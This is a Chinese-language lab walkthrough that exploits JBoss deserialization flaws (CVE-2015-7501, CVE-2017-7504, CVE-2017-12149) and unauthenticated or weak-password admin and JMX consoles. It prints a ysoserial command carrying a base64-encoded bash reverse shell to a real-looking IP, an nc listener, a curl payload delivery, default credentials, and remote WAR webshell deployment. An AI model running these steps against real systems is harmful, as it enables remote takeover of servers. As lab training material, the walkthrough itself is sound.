一、CVE-2015-7501
1、開環境
2、訪問地址
出現了讓下載的頁面,說明有漏洞
3、下載ysoserial工具進行漏洞利用
4、在cmd運行
看到可以成功運行,接下來去base64編碼我們反彈shell的命令
5、執行命令
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx}|{base64,-d} | {bash,-i} ">exp.ser
6、監聽端口
nc -lvvp 6666
7、執行命令
curl http://150.158.199.164:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
8、得到shell
二、CVE-2017-7504
1、開環境
2、訪問目錄
/jbossmq-httpil/HTTPServerILServlet
3、在kali運行python程序
python jexboss.py -u 指定網站
拿到shell
三、CVE-2017-12149
1、開環境
2、訪問目錄
/invoker/readonly
返回500說明此頁面存在反序列化漏洞
3、使用工具檢測
輸入網址,檢測,存在漏洞,系統是Linux
4、執行命令
whoami
四、Administration Console弱口令
1、開環境
環境還是上一個的環境
2、登錄后臺
/admin-console/login.seam
使用弱口令admin/vulhub登錄
3、點擊web應用
4、上war包,注入這個包的名字不可以太短
5、訪問文件
6、測試連接
五、低版本JMX Console未授權
1、開環境
訪問/jmx-console/
密碼是admin admin
2、進入目錄
3、在我們服務器的網站上傳一個war包
4、遠程部署war包
http://150.158.199.164:8080/wjf111.war
5、訪問文件
/wjf111/1.jsp
6、測試連接
六、高版本JMX Console未授權
1、開環境
訪問/jmx-console
2、找到文件部署的位置
Jboss.system——service=MainDeployer
——deploy——java.net.URL
3、把我們服務器里的war包改下名字
4、遠程部署war包
http://150.158.199.164/wjf222.war